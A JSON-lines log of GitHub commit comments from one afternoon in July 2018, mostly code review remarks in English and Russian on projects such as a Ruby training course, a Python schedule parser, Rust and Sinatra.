{"id":"8045060084","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"fidals/shopelectro"},"payload":{"comment":{"id":29906787,"position":null,"line":null,"path":null,"commit_id":"10514ec8ea45e7c39d6c1797600f4e61c0099b07","created_at":"2018-07-31T15:58:18Z","updated_at":"2018-07-31T15:58:18Z","author_association":"COLLABORATOR","body":"Puzzle `129-385e3122` disappeared from [`front/js/shared/yandex.es6`](https://github.com/fidals/shopelectro/blob/master/front/js/shared/yandex.es6), that's why I closed #434. Please, remember that the puzzle was not necessarily removed in this particular commit. Maybe it happened earlier, but we discovered this fact only now."}},"created_at":"2018-07-31T15:58:18Z"}
{"id":"8045061040","type":"CommitCommentEvent","actor":{"login":"32SH"},"repo":{"name":"32SH/portfolio"},"payload":{"comment":{"id":29906791,"position":null,"line":null,"path":null,"commit_id":"56a8244ed35e1f21cecd1bb4c386a5e6b062e23e","created_at":"2018-07-31T15:58:28Z","updated_at":"2018-07-31T15:58:28Z","author_association":"OWNER","body":"\r\n# Website\r\nThe website for ShathaPr"}},"created_at":"2018-07-31T15:58:28Z"}
{"id":"8045062275","type":"CommitCommentEvent","actor":{"login":"TungTT3"},"repo":{"name":"phamthanh2711/QuanLyKhachHang"},"payload":{"comment":{"id":29906793,"position":null,"line":null,"path":null,"commit_id":"5a0cb5cee73c59b5eb0fbe001a9193e9a39f0508","created_at":"2018-07-31T15:58:41Z","updated_at":"2018-07-31T15:58:41Z","author_association":"CONTRIBUTOR","body":"![image](https://user-images.githubusercontent.com/29173113/43471433-2d55e3aa-9515-11e8-9dbe-38cc9deedb90.png)\r\nĐừng commit những file như thế này lên nhé, vì không có giá trị, chỉ commit file souce code lên thôi"}},"created_at":"2018-07-31T15:58:41Z"}
{"id":"8045064517","type":"CommitCommentEvent","actor":{"login":"neomonkeus"},"repo":{"name":"TagnumElite/blender_nif_plugin"},"payload":{"comment":{"id":29906800,"position":3,"line":283,"path":"io_scene_nif/texturesys/texture_import.py","commit_id":"21c9376ea41c963bd5d6661023ac8fe1a03fb452","created_at":"2018-07-31T15:59:03Z","updated_at":"2018-07-31T15:59:03Z","author_association":"NONE","body":"`texslot.texture.image.use_animation = True` should be pushed into the `if ShaderProperty.controller:` check."}},"created_at":"2018-07-31T15:59:03Z"}
{"id":"8045067466","type":"CommitCommentEvent","actor":{"login":"neomonkeus"},"repo":{"name":"TagnumElite/blender_nif_plugin"},"payload":{"comment":{"id":29906807,"position":20,"line":90,"path":"testframework/integration/property/material/b_gen_material.py","commit_id":"21c9376ea41c963bd5d6661023ac8fe1a03fb452","created_at":"2018-07-31T15:59:32Z","updated_at":"2018-07-31T15:59:32Z","author_association":"NONE","body":"Pylint will dislike you for not having a line return"}},"created_at":"2018-07-31T15:59:32Z"}
{"id":"8045069669","type":"CommitCommentEvent","actor":{"login":"halonazhao"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29906809,"position":null,"line":null,"path":null,"commit_id":"1d72d6ce114e282bea2ba92410d0a280d8a85c39","created_at":"2018-07-31T15:59:51Z","updated_at":"2018-07-31T15:59:51Z","author_association":"COLLABORATOR","body":"Hello Dr. @JacquesCarette,\r\nAfter exploring more about this spot, I found out that * should not be applied those 3 instances as + is. Because it would effect precedence. If adding those instances, precedence would go wrong. So if expanding this theory to addition, I don't think we need those instances either. If keep those instances for addition, it won't cause error because `add` has the lowest precedence comparing with `subtraction` and `multiplication`. Say if there is an operation having lower precedence than `add` (although likely not possible), it would cause error. So I don't think these instances make this structure any better.\r\nIf you don't have different opinion, I think this branch is ready to be merged in.\r\n"}},"created_at":"2018-07-31T15:59:51Z"}
{"id":"8045069841","type":"CommitCommentEvent","actor":{"login":"pr2git"},"repo":{"name":"OpenViX/enigma2"},"payload":{"comment":{"id":29906811,"position":null,"line":null,"path":null,"commit_id":"ed689159e75bed8a8df56668bb3ca67d844468f6","created_at":"2018-07-31T15:59:53Z","updated_at":"2018-07-31T15:59:53Z","author_association":"NONE","body":"Thanks for this interesting discussion and you get now exactly the goal of this script.\r\n\r\nIf you check in plugin repositories, I had the same approach, I propose the same kind of script (with the same name) for people willing to translate. Because before it was even harder to get an up-to-date pot and po files for plugins. And translators don't need to have a full build environment to do there job.\r\n\r\nFeel free to update the script, it is yours now."}},"created_at":"2018-07-31T15:59:53Z"}
{"id":"8045071640","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"metaphorizer/lessons"},"payload":{"comment":{"id":29906821,"position":2,"line":2,"path":"course_1/part_4/classes.rb","commit_id":"1539acc145b1215d443c75473be5dbc77238dcb8","created_at":"2018-07-31T16:00:12Z","updated_at":"2018-07-31T16:00:12Z","author_association":"NONE","body":"лучше просто `trains`, `name`\r\nнужно стараться писать лаконичный код, т.е. код краткий, но емкий и понятный"}},"created_at":"2018-07-31T16:00:12Z"}
{"id":"8045079936","type":"CommitCommentEvent","actor":{"login":"nirmaligit"},"repo":{"name":"nirmaligit/git-sandbox"},"payload":{"comment":{"id":29906844,"position":null,"line":null,"path":null,"commit_id":"396c15c23d54079472154e3d0145a39c7f3669bd","created_at":"2018-07-31T16:01:29Z","updated_at":"2018-07-31T16:01:29Z","author_association":"OWNER","body":"commiting"}},"created_at":"2018-07-31T16:01:29Z"}
{"id":"8045081852","type":"CommitCommentEvent","actor":{"login":"Donchenkov"},"repo":{"name":"Donchenkov/Java.Level1"},"payload":{"comment":{"id":29906850,"position":20,"line":20,"path":"Person.java","commit_id":"1be5f6378e2aed4642b7ea014f37d735eb46376c","created_at":"2018-07-31T16:01:48Z","updated_at":"2018-07-31T16:01:48Z","author_association":"OWNER","body":"public Person(int age) {\r\n        this.age = age;\r\n\r\n    }"}},"created_at":"2018-07-31T16:01:48Z"}
{"id":"8045089205","type":"CommitCommentEvent","actor":{"login":"Donchenkov"},"repo":{"name":"Donchenkov/Java.Level1"},"payload":{"comment":{"id":29906871,"position":24,"line":24,"path":"Main.java","commit_id":"1be5f6378e2aed4642b7ea014f37d735eb46376c","created_at":"2018-07-31T16:03:01Z","updated_at":"2018-07-31T16:03:01Z","author_association":"OWNER","body":"            if (persArray[i].age > 40){\r\n                persArray[i].printInfo();\r\n            }"}},"created_at":"2018-07-31T16:03:01Z"}
{"id":"8045093706","type":"CommitCommentEvent","actor":{"login":"Donchenkov"},"repo":{"name":"Donchenkov/Java.Level1"},"payload":{"comment":{"id":29906886,"position":null,"line":null,"path":null,"commit_id":"1be5f6378e2aed4642b7ea014f37d735eb46376c","created_at":"2018-07-31T16:03:44Z","updated_at":"2018-07-31T16:03:44Z","author_association":"OWNER","body":"Додумал))"}},"created_at":"2018-07-31T16:03:44Z"}
{"id":"8045094711","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"metaphorizer/lessons"},"payload":{"comment":{"id":29906889,"position":33,"line":33,"path":"course_1/part_4/classes.rb","commit_id":"1539acc145b1215d443c75473be5dbc77238dcb8","created_at":"2018-07-31T16:03:54Z","updated_at":"2018-07-31T16:03:54Z","author_association":"NONE","body":"лучше просто `stations`"}},"created_at":"2018-07-31T16:03:54Z"}
{"id":"8045095566","type":"CommitCommentEvent","actor":{"login":"chiraag-nataraj"},"repo":{"name":"netblue30/firejail"},"payload":{"comment":{"id":29906890,"position":null,"line":null,"path":null,"commit_id":"123b2b1e256a17425afa32b238a9c448184f065b","created_at":"2018-07-31T16:04:04Z","updated_at":"2018-07-31T16:04:04Z","author_association":"COLLABORATOR","body":"Solved in the latest commit."}},"created_at":"2018-07-31T16:04:04Z"}
{"id":"8045096084","type":"CommitCommentEvent","actor":{"login":"Nisnow"},"repo":{"name":"HHSProgrammingClub/smash-my-buttons"},"payload":{"comment":{"id":29906892,"position":null,"line":null,"path":null,"commit_id":"d44964f4593d0d811c513bf42d9a81c2d146aecd","created_at":"2018-07-31T16:04:10Z","updated_at":"2018-07-31T16:04:10Z","author_association":"CONTRIBUTOR","body":"Unless you're talking about the numbers, then idk"}},"created_at":"2018-07-31T16:04:10Z"}
{"id":"8045097857","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"metaphorizer/lessons"},"payload":{"comment":{"id":29906896,"position":38,"line":38,"path":"course_1/part_4/classes.rb","commit_id":"1539acc145b1215d443c75473be5dbc77238dcb8","created_at":"2018-07-31T16:04:28Z","updated_at":"2018-07-31T16:04:28Z","author_association":"NONE","body":"`add_station`"}},"created_at":"2018-07-31T16:04:28Z"}
{"id":"8045098920","type":"CommitCommentEvent","actor":{"login":"fgrsnau"},"repo":{"name":"pawelswoboda/LP_MP"},"payload":{"comment":{"id":29906899,"position":928,"line":3568,"path":"include/factors_messages.hxx","commit_id":"a9d1071b0f047878ccb2b434471c34ddcf9cdfa6","created_at":"2018-07-31T16:04:40Z","updated_at":"2018-07-31T16:04:40Z","author_association":"CONTRIBUTOR","body":"The reverts my bugfix from commit d1b87cb5a8a66aa6b8c5a34cd9bbba32c802a20d. The fold expression over the comma operator has a well-defined defined evaluation order. The `std::make_tuple` call above in `construct_constraints_impl` has undefined evaluation order for the function parameters. The problem is that both functions must be called in the same order, as they have side effects (incrementing the counter for the current variable).\r\n(It would be arguably better to get rid of this hidden side-effect.)"}},"created_at":"2018-07-31T16:04:40Z"}
{"id":"8045099867","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"metaphorizer/lessons"},"payload":{"comment":{"id":29906900,"position":42,"line":42,"path":"course_1/part_4/classes.rb","commit_id":"1539acc145b1215d443c75473be5dbc77238dcb8","created_at":"2018-07-31T16:04:49Z","updated_at":"2018-07-31T16:04:49Z","author_association":"NONE","body":"`remove_station`"}},"created_at":"2018-07-31T16:04:49Z"}
{"id":"8045100883","type":"CommitCommentEvent","actor":{"login":"gueyendiora"},"repo":{"name":"AmauriC/tarteaucitron.js"},"payload":{"comment":{"id":29906903,"position":41,"line":1302,"path":"tarteaucitron.js","commit_id":"1ea7bfa82ab2fca3ca1faacd66b96f39b4e638d4","created_at":"2018-07-31T16:04:59Z","updated_at":"2018-07-31T16:04:59Z","author_association":"NONE","body":"Corige tous les erreurs"}},"created_at":"2018-07-31T16:04:59Z"}
{"id":"8045103627","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"metaphorizer/lessons"},"payload":{"comment":{"id":29906911,"position":43,"line":43,"path":"course_1/part_4/classes.rb","commit_id":"1539acc145b1215d443c75473be5dbc77238dcb8","created_at":"2018-07-31T16:05:26Z","updated_at":"2018-07-31T16:05:26Z","author_association":"NONE","body":"в ТЗ:\r\n\"Может удалять **промежуточную** станцию из списка\"\r\nэтот метод удалит **любую** станцию, в том числе начальную и конечную, что неверно"}},"created_at":"2018-07-31T16:05:26Z"}
{"id":"8045106964","type":"CommitCommentEvent","actor":{"login":"max4ice"},"repo":{"name":"dogecoin/libdohj"},"payload":{"comment":{"id":29906915,"position":null,"line":null,"path":null,"commit_id":"6ce57fdb044ad9b60df265c117ad81f046904bd4","created_at":"2018-07-31T16:06:01Z","updated_at":"2018-07-31T16:06:01Z","author_association":"NONE","body":"That's good"}},"created_at":"2018-07-31T16:06:01Z"}
{"id":"8045107141","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"metaphorizer/lessons"},"payload":{"comment":{"id":29906916,"position":45,"line":45,"path":"course_1/part_4/classes.rb","commit_id":"1539acc145b1215d443c75473be5dbc77238dcb8","created_at":"2018-07-31T16:06:03Z","updated_at":"2018-07-31T16:06:03Z","author_association":"NONE","body":"подумай, что в задании может означать вот эта фраза: \"Имеет начальную и конечную станцию\""}},"created_at":"2018-07-31T16:06:03Z"}
{"id":"8045115126","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"metaphorizer/lessons"},"payload":{"comment":{"id":29906933,"position":26,"line":26,"path":"course_1/part_4/classes.rb","commit_id":"1539acc145b1215d443c75473be5dbc77238dcb8","created_at":"2018-07-31T16:07:27Z","updated_at":"2018-07-31T16:07:27Z","author_association":"NONE","body":"`trains_by_type(type)`"}},"created_at":"2018-07-31T16:07:27Z"}
{"id":"8045119030","type":"CommitCommentEvent","actor":{"login":"Nisnow"},"repo":{"name":"HHSProgrammingClub/smash-my-buttons"},"payload":{"comment":{"id":29906941,"position":null,"line":null,"path":null,"commit_id":"d44964f4593d0d811c513bf42d9a81c2d146aecd","created_at":"2018-07-31T16:08:09Z","updated_at":"2018-07-31T16:08:09Z","author_association":"CONTRIBUTOR","body":"Controls are working --- tested by printing out stuff in the console --- animations aren't working is all."}},"created_at":"2018-07-31T16:08:09Z"}
{"id":"8045119363","type":"CommitCommentEvent","actor":{"login":"sisansahu1"},"repo":{"name":"sisansahu1/Python"},"payload":{"comment":{"id":29906942,"position":null,"line":null,"path":null,"commit_id":"598712dd38e248ce76d24bfbc8c273a20e35d0a8","created_at":"2018-07-31T16:08:12Z","updated_at":"2018-07-31T16:08:12Z","author_association":"OWNER","body":"y"}},"created_at":"2018-07-31T16:08:12Z"}
{"id":"8045120827","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"metaphorizer/lessons"},"payload":{"comment":{"id":29906947,"position":27,"line":27,"path":"course_1/part_4/classes.rb","commit_id":"1539acc145b1215d443c75473be5dbc77238dcb8","created_at":"2018-07-31T16:08:27Z","updated_at":"2018-07-31T16:08:27Z","author_association":"NONE","body":"\"ретерн\" не нужен, в руби по дефолту метод возвращает значение последней строки"}},"created_at":"2018-07-31T16:08:27Z"}
{"id":"8045124187","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"metaphorizer/lessons"},"payload":{"comment":{"id":29906952,"position":27,"line":27,"path":"course_1/part_4/classes.rb","commit_id":"1539acc145b1215d443c75473be5dbc77238dcb8","created_at":"2018-07-31T16:09:03Z","updated_at":"2018-07-31T16:09:03Z","author_association":"NONE","body":"`one_of_the_trains` => `train`"}},"created_at":"2018-07-31T16:09:03Z"}
{"id":"8045124261","type":"CommitCommentEvent","actor":{"login":"MSP-Greg"},"repo":{"name":"ruby/ruby"},"payload":{"comment":{"id":29906953,"position":null,"line":null,"path":null,"commit_id":"ca32fe167303becd98027afb42f6228b026f00a5","created_at":"2018-07-31T16:09:03Z","updated_at":"2018-07-31T16:09:03Z","author_association":"NONE","body":"@hsbt\r\n\r\nSomething like the following works (checked with trunk). FYI...\r\n```\r\nrequire_relative Dir.glob('{lib/,}e2mmap/version.rb')[0]\r\n```\r\n\r\n"}},"created_at":"2018-07-31T16:09:03Z"}
{"id":"8045147518","type":"CommitCommentEvent","actor":{"login":"asmecher"},"repo":{"name":"NateWr/pkp-lib"},"payload":{"comment":{"id":29907003,"position":214,"line":214,"path":"classes/services/PKPContextService.inc.php","commit_id":"70a99f8413a80dbc2bb77f6c9591e1617524a6e0","created_at":"2018-07-31T16:13:08Z","updated_at":"2018-07-31T16:13:08Z","author_association":"NONE","body":"This divides validation into yet another place:\r\n- Form classes (the `validate` function)\r\n- Validator classes (referenced by forms, generally added in form constructors but also usable elsewhere)\r\n- (To some extent, in the policy framework and the handler classes)\r\n- Now also the service `validate` function\r\n\r\nThis proposal isn't a bad one, but I think it's a good idea to start planning for a reduction in the number of tools. I can think of two routes to go:\r\n- Strengthen the validator classes so that they can be brought in wherever they're needed -- possibly rewriting them e.g. to mesh nicely with the `filter_var` toolset, or\r\n- Get rid of the validator classes entirely, hopefully deprecate the policy framework entirely in favour of another standard toolset, and lean mostly on the service classes, including this new construct.\r\n\r\nOne thing worth considering here, I think, is how to avoid the accretion of large blocks of validation code for different concerns. That's one thing the validator classes do nicely (not necessarily saying I lean that direction...)"}},"created_at":"2018-07-31T16:13:08Z"}
{"id":"8045147679","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"metaphorizer/lessons"},"payload":{"comment":{"id":29907005,"position":62,"line":62,"path":"course_1/part_4/classes.rb","commit_id":"1539acc145b1215d443c75473be5dbc77238dcb8","created_at":"2018-07-31T16:13:10Z","updated_at":"2018-07-31T16:13:10Z","author_association":"NONE","body":"в задании:\r\n\"Может тормозить (сбрасывать скорость до нуля)\"\r\n\r\nметод реализован в виде стопкрана, т.е. скорость сразу сбрасывается до нуля\r\n(в задании возможно не очень ясная формулировка, но она означает, что поезд может тормозить и это не обязательно должно быть полное торможение, фраза же \"сбрасывать скорость до нуля\" означает, \"обратите внимание! скорость не должна быть меньше нуля\" :) )"}},"created_at":"2018-07-31T16:13:10Z"}
{"id":"8045149090","type":"CommitCommentEvent","actor":{"login":"natanbc"},"repo":{"name":"Mantaro/MantaroBot"},"payload":{"comment":{"id":29907008,"position":null,"line":null,"path":null,"commit_id":"0dcd2bb7878b3c88eb173bf48386f535077e00e6","created_at":"2018-07-31T16:13:25Z","updated_at":"2018-07-31T16:13:25Z","author_association":"MEMBER","body":"this is so sad alexa play despacito earrape nightcore"}},"created_at":"2018-07-31T16:13:25Z"}
{"id":"8045151971","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"metaphorizer/lessons"},"payload":{"comment":{"id":29907013,"position":62,"line":62,"path":"course_1/part_4/classes.rb","commit_id":"1539acc145b1215d443c75473be5dbc77238dcb8","created_at":"2018-07-31T16:13:55Z","updated_at":"2018-07-31T16:13:55Z","author_association":"NONE","body":"лучше этот метод сделать аналогично ускоряющему"}},"created_at":"2018-07-31T16:13:55Z"}
{"id":"8045158211","type":"CommitCommentEvent","actor":{"login":"raxoft"},"repo":{"name":"sinatra/sinatra"},"payload":{"comment":{"id":29907022,"position":null,"line":null,"path":null,"commit_id":"4b77084a178665c3732ee7251d15cf18ed2fea6c","created_at":"2018-07-31T16:15:01Z","updated_at":"2018-07-31T16:15:01Z","author_association":"CONTRIBUTOR","body":"Seriously? You bring in the 2.6MB activesupport gem just because this file uses `Object#try` at two places? Why not just get rid of `Object#try` instead? I am not really excited seeing activesupport among dependencies of my projects just because of this change... Thanks for considering changing this."}},"created_at":"2018-07-31T16:15:01Z"}
{"id":"8045160899","type":"CommitCommentEvent","actor":{"login":"slmeghana"},"repo":{"name":"slmeghana/test"},"payload":{"comment":{"id":29907037,"position":null,"line":null,"path":null,"commit_id":"8395746d708e0228bab72a110468fe3cbf2f534f","created_at":"2018-07-31T16:15:30Z","updated_at":"2018-07-31T16:15:30Z","author_association":"OWNER","body":"merged"}},"created_at":"2018-07-31T16:15:30Z"}
{"id":"8045167639","type":"CommitCommentEvent","actor":{"login":"jcorporation"},"repo":{"name":"jcorporation/myMPD"},"payload":{"comment":{"id":29907051,"position":null,"line":null,"path":null,"commit_id":"338b74f3f547ece3a76110bd3d3383eeaf2df01c","created_at":"2018-07-31T16:16:40Z","updated_at":"2018-07-31T16:16:40Z","author_association":"OWNER","body":"right, I fixed it."}},"created_at":"2018-07-31T16:16:40Z"}
{"id":"8045169351","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"metaphorizer/lessons"},"payload":{"comment":{"id":29907054,"position":52,"line":52,"path":"course_1/part_4/classes.rb","commit_id":"1539acc145b1215d443c75473be5dbc77238dcb8","created_at":"2018-07-31T16:16:58Z","updated_at":"2018-07-31T16:16:58Z","author_association":"NONE","body":"`number`, `type`, `length`\r\nв противном случае у тебя код будет заикаться при вызове одноименных геттеров у объекта класса Трейн:\r\n```ruby\r\ntrain.train_number\r\ntrain.train_type\r\ntrain.train_length\r\n```"}},"created_at":"2018-07-31T16:16:58Z"}
{"id":"8045172715","type":"CommitCommentEvent","actor":{"login":"rryk"},"repo":{"name":"mikedmor/OctoPrint_MultiCam"},"payload":{"comment":{"id":29907062,"position":39,"line":39,"path":"octoprint_multicam/static/js/multicam.js","commit_id":"63978e5b13e27c09f39771276022739478930b5b","created_at":"2018-07-31T16:17:34Z","updated_at":"2018-07-31T16:17:34Z","author_association":"NONE","body":"I am curious why you didn't choose to insert your controls into the \"control-job-custom\" div? Based on the id, its seems like it was designed specifically for adding more controls to the Control tab: https://github.com/foosel/OctoPrint/blob/6d7f8a2a64b364504f11dafd5009a85fb785127a/src/octoprint/templates/tabs/control.jinja2#L123. Or did you experience issues adding it there?"}},"created_at":"2018-07-31T16:17:34Z"}
{"id":"8045174456","type":"CommitCommentEvent","actor":{"login":"tannisthamaiti"},"repo":{"name":"tannisthamaiti/Springboard"},"payload":{"comment":{"id":29907067,"position":null,"line":null,"path":null,"commit_id":"94a9e08d71d0db34473068f1d469c0dfd8493b1e","created_at":"2018-07-31T16:17:53Z","updated_at":"2018-07-31T16:17:53Z","author_association":"OWNER","body":"get attributes of business.json "}},"created_at":"2018-07-31T16:17:53Z"}
{"id":"8045174666","type":"CommitCommentEvent","actor":{"login":"asmecher"},"repo":{"name":"NateWr/pkp-docs"},"payload":{"comment":{"id":29907068,"position":167,"line":167,"path":"schema/index.md","commit_id":"41ca6165e9c40a3c0b0e283d22a4e02349279f2b","created_at":"2018-07-31T16:17:55Z","updated_at":"2018-07-31T16:17:55Z","author_association":"NONE","body":"This starts to stray into automatic ER mapping territory -- I last played with this a looong time ago in Enterprise JavaBeans territory and found it ... cranky and hard to optimize. But that's a lot of years ago and I'm open to the idea. Do either you or @defstat know any tools/libraries that are active in PHP-land for this?"}},"created_at":"2018-07-31T16:17:55Z"}
{"id":"8045176952","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"metaphorizer/lessons"},"payload":{"comment":{"id":29907072,"position":53,"line":53,"path":"course_1/part_4/classes.rb","commit_id":"1539acc145b1215d443c75473be5dbc77238dcb8","created_at":"2018-07-31T16:18:20Z","updated_at":"2018-07-31T16:18:20Z","author_association":"NONE","body":"можно просто `speed`"}},"created_at":"2018-07-31T16:18:20Z"}
{"id":"8045179030","type":"CommitCommentEvent","actor":{"login":"AzGilrock"},"repo":{"name":"smeighan/xLights"},"payload":{"comment":{"id":29907075,"position":null,"line":null,"path":null,"commit_id":"f977d8d512c95d31bb5b21ccf6b2224af691ed8a","created_at":"2018-07-31T16:18:41Z","updated_at":"2018-07-31T16:18:41Z","author_association":"COLLABORATOR","body":"Umm I'm gonna need to check the PolyLine stuff out because I had the individual segments working the way I like.  If I uncheck the box I don't want it deleting all the segment sizes I want whatever I typed in to be there.  If you delete then one mis-click destroys all your work.  I don't see anything that needed fixing."}},"created_at":"2018-07-31T16:18:41Z"}
{"id":"8045179631","type":"CommitCommentEvent","actor":{"login":"tpimh"},"repo":{"name":"tpimh/nenuzhnix"},"payload":{"comment":{"id":29907076,"position":null,"line":null,"path":null,"commit_id":"c38c92ee87bf5036410ed051ff1eafbf8b7212b7","created_at":"2018-07-31T16:18:47Z","updated_at":"2018-07-31T16:18:47Z","author_association":"OWNER","body":"Close #17 "}},"created_at":"2018-07-31T16:18:47Z"}
{"id":"8045183434","type":"CommitCommentEvent","actor":{"login":"utlemming"},"repo":{"name":"utlemming/helm"},"payload":{"comment":{"id":29907092,"position":null,"line":null,"path":null,"commit_id":"3a6fbee371d90f5c49029a73d46f3a800fe27fa6","created_at":"2018-07-31T16:19:27Z","updated_at":"2018-07-31T16:19:27Z","author_association":"OWNER","body":"Built recurly-app container as `recurly-app/release_3a6fbee371d90f5c49029a73d46f3a800fe27fa6`"}},"created_at":"2018-07-31T16:19:27Z"}
{"id":"8045218469","type":"CommitCommentEvent","actor":{"login":"twalpole"},"repo":{"name":"SeleniumHQ/selenium"},"payload":{"comment":{"id":29907199,"position":9,"line":366,"path":"rb/lib/selenium/webdriver/remote/w3c/bridge.rb","commit_id":"a3d2f41cd392c9842e3b37be673ec0e287c58ce8","created_at":"2018-07-31T16:25:53Z","updated_at":"2018-07-31T16:25:53Z","author_association":"CONTRIBUTOR","body":"Is this correct - or should it be the same as the OSS version above?\r\n"}},"created_at":"2018-07-31T16:25:53Z"}
{"id":"8045220284","type":"CommitCommentEvent","actor":{"login":"AzGilrock"},"repo":{"name":"smeighan/xLights"},"payload":{"comment":{"id":29907205,"position":null,"line":null,"path":null,"commit_id":"f977d8d512c95d31bb5b21ccf6b2224af691ed8a","created_at":"2018-07-31T16:26:12Z","updated_at":"2018-07-31T16:26:12Z","author_association":"COLLABORATOR","body":"I was also thinking something similar for the start channels.  Do I really want all the custom values I've typed in to get whacked if I uncheck the box?  Seems to me it would be better to provide a reset if someone wants to get the xlights stab at numbering."}},"created_at":"2018-07-31T16:26:12Z"}
{"id":"8045221309","type":"CommitCommentEvent","actor":{"login":"antsfree"},"repo":{"name":"antsfree/spider-diamond"},"payload":{"comment":{"id":29907208,"position":null,"line":null,"path":null,"commit_id":"f8d644feab23510bbf27a02a21bda223cf32d194","created_at":"2018-07-31T16:26:24Z","updated_at":"2018-07-31T16:26:24Z","author_association":"OWNER","body":"+1"}},"created_at":"2018-07-31T16:26:24Z"}
{"id":"8045224270","type":"CommitCommentEvent","actor":{"login":"miner34006"},"repo":{"name":"Spectra456/Schedule"},"payload":{"comment":{"id":29907220,"position":12,"line":12,"path":"parser.py","commit_id":"f775bb3e4c9d84d67f20a6a9f8211ac46201ed4e","created_at":"2018-07-31T16:26:55Z","updated_at":"2018-07-31T16:26:55Z","author_association":"NONE","body":"Опять таки... Зачем создавать метод, который просто дублирует функционал библиотеки? Если я знаю модуль json, я пойму что эта функция делает. А на деле получается так: я смотрю на этот метод в коде и мне приходится лезть в тело метода, чтобы понять что тут происходит (ничего интересного)."}},"created_at":"2018-07-31T16:26:55Z"}
{"id":"8045224629","type":"CommitCommentEvent","actor":{"login":"mflatt"},"repo":{"name":"racket/racket"},"payload":{"comment":{"id":29907221,"position":83,"line":83,"path":"pkgs/racket-doc/scribblings/foreign/collect-callback.scrbl","commit_id":"d9ec0705cfb0ed0f70ff2917d5eda8dc41892cfa","created_at":"2018-07-31T16:26:59Z","updated_at":"2018-07-31T16:26:59Z","author_association":"MEMBER","body":"Yes – good catch. Fixed in a0ca6d64898c272fd65c1658dd0b7b942fcc7fec."}},"created_at":"2018-07-31T16:26:59Z"}
{"id":"8045228280","type":"CommitCommentEvent","actor":{"login":"bgbrooks2017"},"repo":{"name":"emilionavarro/objectifi"},"payload":{"comment":{"id":29907226,"position":null,"line":null,"path":null,"commit_id":"79c9ac653440b422c92397107349eaf34ac48feb","created_at":"2018-07-31T16:27:39Z","updated_at":"2018-07-31T16:27:39Z","author_association":"COLLABORATOR","body":"'#editName = ngModel' exports ngModel to a local variable editName. We can now use this a check control states such as 'valid', 'dirty', 'touched'... etc."}},"created_at":"2018-07-31T16:27:39Z"}
{"id":"8045229153","type":"CommitCommentEvent","actor":{"login":"Spectra456"},"repo":{"name":"Spectra456/Schedule"},"payload":{"comment":{"id":29907232,"position":57,"line":57,"path":"parser.py","commit_id":"f775bb3e4c9d84d67f20a6a9f8211ac46201ed4e","created_at":"2018-07-31T16:27:48Z","updated_at":"2018-07-31T16:27:48Z","author_association":"OWNER","body":"Ух, это же для проверки просто. Я потом уберу это"}},"created_at":"2018-07-31T16:27:48Z"}
{"id":"8045232507","type":"CommitCommentEvent","actor":{"login":"mreficent"},"repo":{"name":"odoo/odoo"},"payload":{"comment":{"id":29907246,"position":null,"line":null,"path":null,"commit_id":"11a0dd58a7c6f874388f06d2ece33cb1237f79d1","created_at":"2018-07-31T16:28:24Z","updated_at":"2018-07-31T16:28:24Z","author_association":"CONTRIBUTOR","body":"```python\r\nodoo.models:3370 create account.payment.create() includes unknown fields: multi \r\n```"}},"created_at":"2018-07-31T16:28:24Z"}
{"id":"8045234312","type":"CommitCommentEvent","actor":{"login":"tunaung2048"},"repo":{"name":"tunaung2048/hello-world"},"payload":{"comment":{"id":29907254,"position":null,"line":null,"path":null,"commit_id":"53729fa3f1ea6f7179795bd751f485620cd59a93","created_at":"2018-07-31T16:28:43Z","updated_at":"2018-07-31T16:28:43Z","author_association":"OWNER","body":"n/a"}},"created_at":"2018-07-31T16:28:43Z"}
{"id":"8045235396","type":"CommitCommentEvent","actor":{"login":"cramertj"},"repo":{"name":"eddyb/rust"},"payload":{"comment":{"id":29907258,"position":13,"line":263,"path":"src/librustc_resolve/build_reduced_graph.rs","commit_id":"3b5b8b96091b8637e47955962d02978c4d9fb396","created_at":"2018-07-31T16:28:54Z","updated_at":"2018-07-31T16:28:54Z","author_association":"NONE","body":"Won't this break on `use {foo::bar, foo::baz};`? That is, won't it force both `foo`s to resolve through either the `extern::` or `self::` prefix?"}},"created_at":"2018-07-31T16:28:54Z"}
{"id":"8045242623","type":"CommitCommentEvent","actor":{"login":"minsii"},"repo":{"name":"pmodels/mpich"},"payload":{"comment":{"id":29907280,"position":null,"line":null,"path":null,"commit_id":"9ec8b70caa56d03bddc8c1565aaa7222aa87e24e","created_at":"2018-07-31T16:30:15Z","updated_at":"2018-07-31T16:30:15Z","author_association":"CONTRIBUTOR","body":"merged into #3027 except moving MARCO into `posix_pre.h`"}},"created_at":"2018-07-31T16:30:15Z"}
{"id":"8045245528","type":"CommitCommentEvent","actor":{"login":"Spectra456"},"repo":{"name":"Spectra456/Schedule"},"payload":{"comment":{"id":29907290,"position":12,"line":12,"path":"parser.py","commit_id":"f775bb3e4c9d84d67f20a6a9f8211ac46201ed4e","created_at":"2018-07-31T16:30:45Z","updated_at":"2018-07-31T16:30:45Z","author_association":"OWNER","body":"Мне кажется читать такой код будет легче, чем вот это:\r\n`json.loads(requests.get(self.__url).text.values())[1][day].get('lessons')`"}},"created_at":"2018-07-31T16:30:45Z"}
{"id":"8045247794","type":"CommitCommentEvent","actor":{"login":"KaiL4eK"},"repo":{"name":"KaiL4eK/ros_course"},"payload":{"comment":{"id":29907296,"position":14,"line":35,"path":"Topics/5_Roslaunch.md","commit_id":"319030c3e91436d1fee921ad8a45ea9325e72dcc","created_at":"2018-07-31T16:31:09Z","updated_at":"2018-07-31T16:31:09Z","author_association":"OWNER","body":"Ох эти комменты =)"}},"created_at":"2018-07-31T16:31:09Z"}
